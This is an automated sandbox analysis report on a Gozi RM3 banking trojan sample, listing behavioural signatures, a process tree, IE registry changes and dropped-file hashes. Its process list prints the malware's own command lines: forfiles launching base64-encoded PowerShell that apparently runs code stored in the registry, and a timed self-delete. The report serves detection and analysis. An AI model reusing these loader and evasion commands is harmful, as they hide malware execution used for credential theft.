Malware Analysis Report

2024-10-19 03:00

Sample ID 220315-rdvttscdc3
Target 520636dbbdc33d8dbdf1b14f043b46f8.exe
SHA256 bd8aa280646a2b601ccbd5cec125d51646624d34005eb7db56da6b70fda821cb
Tags: gozi_rm3 banker trojan
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256

bd8aa280646a2b601ccbd5cec125d51646624d34005eb7db56da6b70fda821cb

Threat Level: Known bad

The file 520636dbbdc33d8dbdf1b14f043b46f8.exe was found to be: Known bad.

Malicious Activity Summary

gozi_rm3 banker trojan

Gozi RM3

Deletes itself

Uses Tor communications

Drops file in System32 directory

Program crash

Modifies Internet Explorer settings

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Delays execution with timeout.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-03-15 14:05

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-03-15 14:05

Reported

2022-03-15 14:08

Platform

win7-20220310-en

Max time kernel

4294211s

Max time network

158s

Command Line

C:\Windows\Explorer.EXE

Signatures

Gozi RM3

banker trojan gozi_rm3

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A

Uses Tor communications

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff19000000190000009f0400007e020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3200000032000000b804000097020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff6400000019000000ea0400007e020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 406df82d7e38d801 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\MINIE C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{60815881-A471-11EC-ACC4-5A7BB634C6F6} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff4b00000000000000d104000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\520636dbbdc33d8dbdf1b14f043b46f8.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1936 wrote to memory of 1012 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1936 wrote to memory of 1012 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1936 wrote to memory of 1012 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1936 wrote to memory of 1012 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1936 wrote to memory of 984 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1936 wrote to memory of 984 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1936 wrote to memory of 984 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1936 wrote to memory of 984 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1736 wrote to memory of 1356 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 1736 wrote to memory of 1356 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 1736 wrote to memory of 1356 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 1356 wrote to memory of 756 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 1356 wrote to memory of 756 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 1356 wrote to memory of 756 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 756 wrote to memory of 1912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 756 wrote to memory of 1912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 756 wrote to memory of 1912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 1992 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\520636dbbdc33d8dbdf1b14f043b46f8.exe C:\Windows\Explorer.EXE
PID 1912 wrote to memory of 1404 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1912 wrote to memory of 1404 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1912 wrote to memory of 1404 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1912 wrote to memory of 592 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1912 wrote to memory of 592 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1912 wrote to memory of 592 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1912 wrote to memory of 1932 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1912 wrote to memory of 1932 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1912 wrote to memory of 1932 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1932 wrote to memory of 1076 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1932 wrote to memory of 1076 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1932 wrote to memory of 1076 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1912 wrote to memory of 1948 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1912 wrote to memory of 1948 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1912 wrote to memory of 1948 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1948 wrote to memory of 1524 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1948 wrote to memory of 1524 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1948 wrote to memory of 1524 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1912 wrote to memory of 1264 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1788 wrote to memory of 1636 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
PID 1788 wrote to memory of 1636 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
PID 1788 wrote to memory of 1636 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\520636dbbdc33d8dbdf1b14f043b46f8.exe

"C:\Users\Admin\AppData\Local\Temp\520636dbbdc33d8dbdf1b14f043b46f8.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1936 CREDAT:275457 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1936 CREDAT:996356 /prefetch:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA & exit" /p C:\Windows\system32 /s /m po*l.e*e

C:\Windows\system32\forfiles.exe

forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA & exit" /p C:\Windows\system32 /s /m po*l.e*e

C:\Windows\system32\cmd.exe

/k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA & exit

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAG8AdgB0AHMAbAB5ACkAOwBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABvAHYAdABzAGwAeQApACcA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApACcA

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\osypmjrv.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA842.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA841.tmp"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oza3_e8q.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA91C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA91B.tmp"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C timeout /t 5 && del "C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\520636DBBDC33D8DBDF1B14F043B46F8.EXE"

C:\Windows\system32\timeout.exe

timeout /t 5

Network


Files

memory/1992-54-0x000000000040E000-0x0000000000419000-memory.dmp

memory/1992-55-0x000000000040E000-0x0000000000419000-memory.dmp

memory/1992-56-0x0000000000220000-0x000000000022C000-memory.dmp

memory/1992-57-0x0000000075041000-0x0000000075043000-memory.dmp

memory/1992-58-0x0000000000230000-0x0000000000240000-memory.dmp

memory/1992-64-0x0000000001000000-0x000000000106F000-memory.dmp

memory/1992-65-0x0000000000260000-0x0000000000262000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2760940dd3373665524479ac46781ac2
SHA1 93f6a6076c7e1ab3d535a0fb6adcae0313eef8ac
SHA256 a4d66b76de6889bca2606c99d1002b5b01dd2ffd82a3cac12c72e62702c3da47
SHA512 e7f63ae5fc5db271a16b17703a8fdd56d46a6afe1c582d0e519b2c35e0e5126d34019cf0f90d8985772a147f2810409a57e9b718066f1fe1cbbbae3811c7b0de

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 54e9306f95f32e50ccd58af19753d929
SHA1 eab9457321f34d4dcf7d4a0ac83edc9131bf7c57
SHA256 45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72
SHA512 8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 8d59154f9fa5f78b9217db0c169eb259
SHA1 22a3b2e4f5238c8b321b8146dad6950eb272d427
SHA256 b1288af8d602e81a315074a7c369b7d81237d41969290258ef206c17a854e5cf
SHA512 1e89fe9f1a4a7da0ca6c5704d9f09306e67a328611fe8bcc57705e9de7951ad77a2644602f3cc23787404fdb2e619d3615fe6dfbaea9e849ab8480c756c3144d

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\w8w9llr\imagestore.dat

MD5 e0c253dbd4f75919730d1208457db2e0
SHA1 edc50a6801c69134ff04d14f285006ab7ebf0acc
SHA256 059333484fb4042c082f5e1e670bc39356f9a19d934b5c23fc6ab364e89302ee
SHA512 74878e39b29e49e6aed445d75df9e35a0ed49eeffd09a59aefe13effe309d5fffd1ee5bec907f1725d53bb542d448ad8c1260c9cea8eb795c6d4d52f53514595

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3OL83HNN\favicon[1].ico

MD5 a976d227e5d1dcf62f5f7e623211dd1b
SHA1 a2a9dc1abdd3d888484678663928cb024c359ee6
SHA256 66332859bd8e3441a019e073a318b62a47014ba244121301034b510dc7532271
SHA512 6754d545f2ce095cfa1fa7ca9e3223f89e37726ee7e541ebcf3e209e18b2602f3be8677598cb30d697327a63de032c11dbf8ef7ad7889a79c488a21044c1cb3f

memory/1912-71-0x000007FEFB7F1000-0x000007FEFB7F3000-memory.dmp

memory/1912-73-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp

memory/1912-74-0x0000000002830000-0x0000000002832000-memory.dmp

memory/1912-75-0x0000000002832000-0x0000000002834000-memory.dmp

memory/1912-76-0x0000000002834000-0x0000000002837000-memory.dmp

memory/1912-72-0x000007FEF2C60000-0x000007FEF37BD000-memory.dmp

memory/1992-77-0x0000000000260000-0x000000000027A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 625b456ad24406be3c06dce3d5c3432e
SHA1 c7cc8e0c4949ea162d68d6f3e59faedce758d7bf
SHA256 90dabb84166493981c68dee7ee8e96624e4f944dd535cb63f2d982a648cac64e
SHA512 ff3b2c4165ff654727e6e6f3c2c4cbfbc61dfc5c23a1f1f155c1037c088bd07f5ee7a3be75a5867a0c2fb7c328a22a3d950df7e96c0437601533bcde441b92ed

memory/1404-80-0x000007FEF2C60000-0x000007FEF37BD000-memory.dmp

memory/1912-81-0x000000000283B000-0x000000000285A000-memory.dmp

memory/1404-82-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp

